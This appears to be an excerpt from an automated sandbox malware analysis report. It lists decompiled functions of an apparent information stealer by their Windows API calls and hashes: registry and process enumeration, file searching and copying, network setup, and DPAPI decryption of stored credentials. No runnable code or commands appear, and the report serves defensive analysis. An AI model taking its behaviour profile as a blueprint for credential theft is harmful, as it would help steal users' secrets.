Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149BD
Part of subcall function 00414960: wsprintfA.USER32 ref: 004149E9

Part of subcall function 00414ED0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00414F1C
Part of subcall function 00414ED0: HeapAlloc.KERNEL32(00000000), ref: 00414F23
Part of subcall function 00414ED0: wsprintfA.USER32 ref: 00414F3D

Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,04280CE8,00000000,00020019,00000000,0041D289), ref: 00414B41

Part of subcall function 00414AE0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
Part of subcall function 00414AE0: wsprintfA.USER32 ref: 00414BF6
Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C29
Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C36

Part of subcall function 00414DE0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
Part of subcall function 00414DE0: Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
Part of subcall function 00414DE0: Process32Next.KERNEL32(00000000,00000128), ref: 00414E30
Part of subcall function 00414DE0: FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E

lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041095B

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,042805E0), ref: 00404ED9

Strings

E.A, xrefs: 00410981, 004109AC, 00410984

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$CloseOpen$wsprintf$Namelstrcpy$InformationLocallstrlen$CurrentInfoKeyboardLayoutListLocaleProcess32QueryStatusSystemTimeUserValue__aulldivlstrcat$ChangeComputerCreateDefaultDirectoryEnumErrorFileFindFirstFreeGlobalHandleInternetLastLogicalMemoryModuleNextNotificationPowerProcessorSnapshotToolhelp32VolumeWindowsWow64Zone
String ID: E.A
API String ID: 1035121393-2211245587
Opcode ID: b50b97f92ac1b03fa04fa9982154d1fe1055e6412a1f6098fe3d2780cb2908ea
Instruction ID: c29c4d19e1a1d8256a8b8cfc17993bd3f91cdea4a247a897ffed86f061f16859
Opcode Fuzzy Hash: b50b97f92ac1b03fa04fa9982154d1fe1055e6412a1f6098fe3d2780cb2908ea
Instruction Fuzzy Hash: 9372B076D10118AACB15FB91EC91EDEB73DAF14308F51439FB01662491EF346B89CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00411350 Relevance: 6.1, APIs: 4, Instructions: 100stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00411378

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

strtok_s.MSVCRT ref: 0041146F

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,04280410,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: lstrcpystrtok_s$lstrlen
String ID:
API String ID: 3184129880-0
Opcode ID: 5545aeea9f70218a3bcebb816cd815422aaab4b3a10d24494e9a8edd2c88a7b0
Instruction ID: bc44fb65e395c18893d79e2daadfc8d7f4384440e0cba23ba4018ddaa6f79c9f
Opcode Fuzzy Hash: 5545aeea9f70218a3bcebb816cd815422aaab4b3a10d24494e9a8edd2c88a7b0
Instruction Fuzzy Hash: 04417175D00208DBCB04EFE5D855AEEBB75BF48304F00811EE51177290EB38AA85CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 004096C0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552

StrStrA.SHLWAPI(00000000,042860D8), ref: 0040971B

Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
Part of subcall function 004094A0: LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
Part of subcall function 004094A0: LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F

memcmp.MSVCRT ref: 00409774

Part of subcall function 00409540: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
Part of subcall function 00409540: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
Part of subcall function 00409540: LocalFree.KERNEL32(?), ref: 004095AF

Strings

DPAPI, xrefs: 0040976B
, xrefs: 004097A3

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$ChangeCloseCreateDataFindNotificationReadSizeUnprotectlstrcpymemcmp
String ID: $DPAPI
API String ID: 2647593125-1819349886
Opcode ID: 864aad936f7fc2eb44161d906023e230e52a7e38b2e993f875b3424609fc8fe2
Instruction ID: 25d6f3248392bfa9bca68fd769027b68fff5740b7e0b7820d89104a1b18a6e16
Opcode Fuzzy Hash: 864aad936f7fc2eb44161d906023e230e52a7e38b2e993f875b3424609fc8fe2
Instruction Fuzzy Hash: 493141B6D10108EBCF04DF94DC45AEFB7B9AF48704F14452DE905B3292E7389A44CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00414DE0 Relevance: 6.1, APIs: 4, Instructions: 60processCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
Process32Next.KERNEL32(00000000,00000128), ref: 00414E30

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 3491751439-0
Opcode ID: 87b51dc9b2718e0f75fe821cf6208ca8da20a117002ae88deeb1f02fab452054
Instruction ID: b51d58226d22fc07b4aaea4bdcaba1b12d12dab42e387443cd86e66b2ce9f1c4
Opcode Fuzzy Hash: 87b51dc9b2718e0f75fe821cf6208ca8da20a117002ae88deeb1f02fab452054
Instruction Fuzzy Hash: ED211D759002189BCB24EB61DC95FDEB779AF54304F1041DAA50A66190DF38AFC5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004159E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00411879,80000000,00000003,00000000,00000003,00000080,00000000,?,00411879,?), ref: 004159FC
GetFileSizeEx.KERNEL32(000000FF,00411879), ref: 00415A19
CloseHandle.KERNEL32(000000FF), ref: 00415A27

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
Instruction ID: adbcd47bb22ca6d6b42933acd4cabc8e10c5a14c322029dfd4b487fe3fd33794
Opcode Fuzzy Hash: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
Instruction Fuzzy Hash: C9F03139F44604FBDB20DBF0DC85BDE7779BF44710F118255B951A7280DA7496428B44

Uniqueness

Uniqueness Score: -1.00%

Function 004137B3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,04280410,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
CloseHandle.KERNEL32(00000000), ref: 004137B9
Sleep.KERNEL32(00001770), ref: 004137C4
CloseHandle.KERNEL32(?,00000000,?,04280410,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
ExitProcess.KERNEL32 ref: 004137E2

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: 8c395499d79107547ad2670ad1a9bedab58bcd276438d400b3f2e9037467bb4f
Instruction ID: 00ad45554361a1bf9ffb836df5d455c5d00fe00f471bf70531fad30136aebd8c
Opcode Fuzzy Hash: 8c395499d79107547ad2670ad1a9bedab58bcd276438d400b3f2e9037467bb4f
Instruction Fuzzy Hash: 5FF054B0944206AAE720AFA1DD05BFE7675BB08B46F10851AF612951C0DBB856818A5D

Uniqueness

Uniqueness Score: -1.00%

Function 00406730 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

Pi@, xrefs: 004067C2, 0040684E, 0040689F, 0040679E, 00406884

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID:
String ID: Pi@
API String ID: 0-1360946908
Opcode ID: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
Instruction ID: 3e1b1374d11ee30af11b8018be346ecc1401931fa3badc01db0dac5c56ce0c6a
Opcode Fuzzy Hash: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
Instruction Fuzzy Hash: 756105B5D00208DBDB14DF94D984BEEB7B0AB48304F1185AAE80677380D739AEA5DF95

Uniqueness

Uniqueness Score: -1.00%

Function 00404470 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60stringnetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 00414FF0: malloc.MSVCRT ref: 00414FF8

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

Strings

<, xrefs: 00404489

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlenmalloc
String ID: <
API String ID: 3848002758-4251816714
Opcode ID: 00a7aa864931c41dda3f30cbba946e46fcad6bb8072be9055dcaca20141dbc50
Instruction ID: 4ed07355fbd84ea2b0e25782c0c6f45789bb77a73037a8222357df496ca5bcbd
Opcode Fuzzy Hash: 00a7aa864931c41dda3f30cbba946e46fcad6bb8072be9055dcaca20141dbc50
Instruction Fuzzy Hash: 52216DB1D00208ABDF10EFA5E845BDD7B74AB44324F008229FA25B72C0EB346A46CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF80 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,042802C0), ref: 0040EFCE
StrCmpCA.SHLWAPI(00000000,042804F0), ref: 0040F06F
StrCmpCA.SHLWAPI(00000000,04280650), ref: 0040F17E

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 418590e25026fbf574c2224c110534f2e9ad20a82c1e548194048b6896e75406
Instruction ID: 4355cab003f180362ea4467312be264c8b2230b95154913c46dc9b5fce20c885
Opcode Fuzzy Hash: 418590e25026fbf574c2224c110534f2e9ad20a82c1e548194048b6896e75406
Instruction Fuzzy Hash: 8D719871B002099BCF08FF75D9929EEB77AAF94304B10852EF4099B285EA34DE45CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF9F Relevance: 4.7, APIs: 3, Instructions: 177COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,042802C0), ref: 0040EFCE
StrCmpCA.SHLWAPI(00000000,042804F0), ref: 0040F06F
StrCmpCA.SHLWAPI(00000000,04280650), ref: 0040F17E

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: a06bce7ce4d1e61d51bdcb48336c1f92f172b7f521589f612365b6c8b4a25287
Instruction ID: f0c51ec5e8e6f52f2f367cc82315d09f99f950b48122d5325302ee48485a66a2
Opcode Fuzzy Hash: a06bce7ce4d1e61d51bdcb48336c1f92f172b7f521589f612365b6c8b4a25287
Instruction Fuzzy Hash: 03618A71B002099FCF08EF75D9929EEB77AAF94304B10852EF4099B295DA34EE45CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 004127E0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 0041281A
lstrcat.KERNEL32(?,04286770), ref: 00412838

Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
Part of subcall function 00412570: FindFirstFileA.KERNELBASE(?,?), ref: 004125A0

Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
Part of subcall function 00412570: FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
Part of subcall function 00412570: FindClose.KERNEL32(000000FF), ref: 004127CE

Part of subcall function 00412570: wsprintfA.USER32 ref: 0041260A
Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D4B2), ref: 0041261C
Part of subcall function 00412570: wsprintfA.USER32 ref: 00412639
Part of subcall function 00412570: PathMatchSpecA.SHLWAPI(?,?), ref: 0041266F
Part of subcall function 00412570: lstrcat.KERNEL32(?,042804B0), ref: 0041269B
Part of subcall function 00412570: lstrcat.KERNEL32(?,0041D880), ref: 004126AD
Part of subcall function 00412570: lstrcat.KERNEL32(?,?), ref: 004126BE
Part of subcall function 00412570: lstrcat.KERNEL32(?,0041D884), ref: 004126D0
Part of subcall function 00412570: lstrcat.KERNEL32(?,?), ref: 004126E4
Part of subcall function 00412570: CopyFileA.KERNEL32(?,?,00000001), ref: 004126FA
Part of subcall function 00412570: DeleteFileA.KERNEL32(?), ref: 00412779

Part of subcall function 00412570: wsprintfA.USER32 ref: 0041265B

Strings

00A, xrefs: 0041285C, 0041288B, 004128BB, 004128EA, 0041291A, 00412949, 0041296B, 0041285F, 0041288E, 004128BE, 004128ED, 0041291D, 0041294C

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: 00A
API String ID: 2104210347-95910775
Opcode ID: 3d6d887d9629d42dbc2135654f485db11ef72221aefd43be089422dd6f10b4f8
Instruction ID: 9a839e9be304faf39bc4facc08b08f26c4420ed68fa3aa933a56f5c5bfc0aac5
Opcode Fuzzy Hash: 3d6d887d9629d42dbc2135654f485db11ef72221aefd43be089422dd6f10b4f8
Instruction Fuzzy Hash: 6441ABB7A001047BCB24FBE0DC92EEA377E9B94705F00424DB55987191ED74A7D48BD9

Uniqueness

Uniqueness Score: -1.00%

Function 68C13060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 68C13095

Part of subcall function 68C135A0: InitializeCriticalSectionAndSpinCount.KERNEL32(68C9F688,00001000), ref: 68C135D5
Part of subcall function 68C135A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 68C135E0
Part of subcall function 68C135A0: QueryPerformanceFrequency.KERNEL32(?), ref: 68C135FD
Part of subcall function 68C135A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 68C1363F
Part of subcall function 68C135A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 68C1369F
Part of subcall function 68C135A0: __aulldiv.LIBCMT ref: 68C136E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 68C1309F

Part of subcall function 68C35B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,68C356EE,?,00000001), ref: 68C35B85
Part of subcall function 68C35B50: EnterCriticalSection.KERNEL32(68C9F688,?,?,?,68C356EE,?,00000001), ref: 68C35B90
Part of subcall function 68C35B50: LeaveCriticalSection.KERNEL32(68C9F688,?,?,?,68C356EE,?,00000001), ref: 68C35BD8
Part of subcall function 68C35B50: GetTickCount64.KERNEL32 ref: 68C35BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 68C130BE

Part of subcall function 68C130F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 68C13127
Part of subcall function 68C130F0: __aulldiv.LIBCMT ref: 68C13140

Part of subcall function 68C4AB2A: __onexit.LIBCMT ref: 68C4AB30

Memory Dump Source

Source File: 00000008.00000002.3041554680.0000000068C11000.00000020.00000001.01000000.00000018.sdmp, Offset: 68C10000, based on PE: true

Associated: 00000008.00000002.3041520041.0000000068C10000.00000002.00000001.01000000.00000018.sdmpDownload File
Associated: 00000008.00000002.3041646591.0000000068C8D000.00000002.00000001.01000000.00000018.sdmpDownload File
Associated: 00000008.00000002.3041691871.0000000068C9E000.00000004.00000001.01000000.00000018.sdmpDownload File
Associated: 00000008.00000002.3041724661.0000000068CA2000.00000002.00000001.01000000.00000018.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68c10000_u2xs.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: fcccdf6b1453f4925589599c5143b5c2d4627d8eb8ee307c33011f921b3e867b
Instruction ID: 7db6a1e82bdde6dc39570dd2bce008f2503b1a3a6b1fb075cd00e22de6cb2d3d
Opcode Fuzzy Hash: fcccdf6b1453f4925589599c5143b5c2d4627d8eb8ee307c33011f921b3e867b
Instruction Fuzzy Hash: F1F0A426C347489BCE10DF74D8811BEB374AF6B218F906769F88467161FBA0E1E48382

Uniqueness

Uniqueness Score: -1.00%

Function 00415B70 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
CloseHandle.KERNEL32(00000000), ref: 00415BAF

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 97fc9d568dab5260ce1fa1a51ba1ebaf2853d767a04b83f08cd6b5726440208b
Instruction ID: b12b055c0fde6327b7bfc42128d307bcca402a5100f46dd347d8d84938e244fe
Opcode Fuzzy Hash: 97fc9d568dab5260ce1fa1a51ba1ebaf2853d767a04b83f08cd6b5726440208b
Instruction Fuzzy Hash: C5F05475A0010CFBDB14DFA4DC4AFED7778BB08300F004499BA0597280D6B06E85CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00414400 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
HeapAlloc.KERNEL32(00000000), ref: 00414414
GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
Instruction ID: 2ac30a00ccf60c4f43266989ac8565747831d88261cb92d9c694311de33eed43
Opcode Fuzzy Hash: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
Instruction Fuzzy Hash: F1E0D8B0A00608FBCB20DFE4DD48BDD77BCAB04305F100055FA05D3240D7749A458B96

Uniqueness

Uniqueness Score: -1.00%

Function 004010D0 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
